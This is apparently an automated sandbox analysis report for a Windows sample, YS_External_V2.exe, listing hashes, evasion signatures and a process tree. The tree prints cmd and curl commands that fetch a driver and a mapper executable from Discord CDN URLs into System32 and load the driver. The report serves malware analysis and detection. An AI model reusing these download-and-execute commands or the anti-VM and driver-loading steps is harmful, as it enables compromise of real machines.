Analysis
-
max time kernel
30s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
26-03-2023 08:51
Behavioral task
behavioral1
Sample
YS_External_V2.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
YS_External_V2.exe
Resource
win10v2004-20230220-en
General
-
Target
YS_External_V2.exe
-
Size
23.5MB
-
MD5
49bd07fcd35833d498db74a30e8da0c4
-
SHA1
695998aa01dcb54bbb8f3432d3eca4e39e84ee9b
-
SHA256
863ef4a6cc53d9ba762c43b053c60ff854ed5bb2a635d49ffa166569e8a8996c
-
SHA512
752ef105d0cc9196278f6fc9dbe40c6a940ae5543fc03962cfaa45c6e0e7183c6cfb7950d823131b01e6928214b408602bf888fcac531c7f8ed99ebeb07a21fa
-
SSDEEP
393216:nsL9KDKh8hHNQu6UDB5w0Lp/juLBqyBRhfvSOMQ0569yjRZ:nsLMDxy5cgqxjuwyBjAjo9k
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
YS_External_V2.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ YS_External_V2.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
yamsmapper.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv" yamsmapper.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
YS_External_V2.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion YS_External_V2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion YS_External_V2.exe -
Executes dropped EXE 1 IoCs
Processes:
yamsmapper.exepid process 4340 yamsmapper.exe -
Processes:
resource yara_rule behavioral2/memory/1292-133-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp themida behavioral2/memory/1292-134-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp themida behavioral2/memory/1292-135-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp themida behavioral2/memory/1292-136-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp themida behavioral2/memory/1292-137-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp themida behavioral2/memory/1292-145-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp themida -
Processes:
YS_External_V2.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA YS_External_V2.exe -
Drops file in System32 directory 2 IoCs
Processes:
curl.execurl.exedescription ioc process File created C:\Windows\System32\yamsud.sys curl.exe File created C:\Windows\System32\yamsmapper.exe curl.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
YS_External_V2.exepid process 1292 YS_External_V2.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
yamsmapper.exepid process 4340 yamsmapper.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
yamsmapper.exedescription pid process Token: SeLoadDriverPrivilege 4340 yamsmapper.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
YS_External_V2.execmd.execmd.execmd.exedescription pid process target process PID 1292 wrote to memory of 1676 1292 YS_External_V2.exe cmd.exe PID 1292 wrote to memory of 1676 1292 YS_External_V2.exe cmd.exe PID 1292 wrote to memory of 4456 1292 YS_External_V2.exe cmd.exe PID 1292 wrote to memory of 4456 1292 YS_External_V2.exe cmd.exe PID 4456 wrote to memory of 220 4456 cmd.exe curl.exe PID 4456 wrote to memory of 220 4456 cmd.exe curl.exe PID 1292 wrote to memory of 4408 1292 YS_External_V2.exe cmd.exe PID 1292 wrote to memory of 4408 1292 YS_External_V2.exe cmd.exe PID 4408 wrote to memory of 4060 4408 cmd.exe curl.exe PID 4408 wrote to memory of 4060 4408 cmd.exe curl.exe PID 1292 wrote to memory of 2064 1292 YS_External_V2.exe cmd.exe PID 1292 wrote to memory of 2064 1292 YS_External_V2.exe cmd.exe PID 1292 wrote to memory of 1492 1292 YS_External_V2.exe cmd.exe PID 1292 wrote to memory of 1492 1292 YS_External_V2.exe cmd.exe PID 1492 wrote to memory of 4340 1492 cmd.exe yamsmapper.exe PID 1492 wrote to memory of 4340 1492 cmd.exe yamsmapper.exe PID 1292 wrote to memory of 4320 1292 YS_External_V2.exe cmd.exe PID 1292 wrote to memory of 4320 1292 YS_External_V2.exe cmd.exe PID 1292 wrote to memory of 1652 1292 YS_External_V2.exe cmd.exe PID 1292 wrote to memory of 1652 1292 YS_External_V2.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe"C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\yamsmapper.exeC:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause >nul 2>&12⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\System32\yamsmapper.exeFilesize
153KB
MD5666d7f4bb7cf64772755b9a184486525
SHA1a645d988ff67e72aac11cc9560dbf89a8320aef0
SHA256a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577
SHA5123670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864
-
C:\Windows\System32\yamsmapper.exeFilesize
153KB
MD5666d7f4bb7cf64772755b9a184486525
SHA1a645d988ff67e72aac11cc9560dbf89a8320aef0
SHA256a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577
SHA5123670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864
-
C:\Windows\System32\yamsud.sysFilesize
12KB
MD5141ecbccc4bfbf03b8768232d5c6a273
SHA10e0c0340b8bccfd6aa352e80739c882e4bbe5404
SHA2562be40511b4f941f899dcfc579c7f31cfd555292d325d7089a69be76bc9eab122
SHA512aa0f0bdfab84a6b41006acf40ecfc87aa8bbe5a576d1e696e5c099140e0ac8b2d144d60b112f045dbcc7f13d21b34580b842fe42e9f38727688cddbc4f1787a7
-
memory/1292-133-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmpFilesize
36.9MB
-
memory/1292-134-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmpFilesize
36.9MB
-
memory/1292-135-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmpFilesize
36.9MB
-
memory/1292-136-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmpFilesize
36.9MB
-
memory/1292-137-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmpFilesize
36.9MB
-
memory/1292-145-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmpFilesize
36.9MB